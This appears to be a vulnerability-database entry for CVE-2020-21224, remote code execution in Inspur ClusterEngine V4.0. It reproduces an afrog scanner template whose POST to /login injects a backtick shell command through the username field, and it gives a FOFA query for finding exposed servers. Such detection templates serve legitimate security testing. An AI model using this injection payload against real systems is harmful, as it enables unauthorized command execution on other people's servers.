CVE-2020-21224: Inspur ClusterEngine V4.0 Remote Code Execution

日期: 2025-09-01 | 影响软件: Inspur ClusterEngine V4.0 | POC: 已公开

漏洞描述

A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server fofa: title="Inspur ClusterEngine"

PoC代码[已公开]

id: CVE-2020-21224

info:
  name: Inspur ClusterEngine V4.0 Remote Code Execution
  author: jingling
  severity: critical
  description: |-
    A Remote Code Execution vulnerability has been found in Inspur ClusterEngine V4.0. A remote attacker can send a malicious login packet to the control server
    fofa: title="Inspur ClusterEngine"
  reference:
    - https://security.netapp.com/advisory/ntap-20210115-0005/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-21224
  tags: cve,cve2020,inspur,clusterengine,rce
  created: 2024/04/18

set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: POST
      path: /login
      body: op=login&username=1 2\',\'1\'\);`expr%20{{r1}}%20%2b%20{{r2}}`
    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2020/CVE-2020-21224.yaml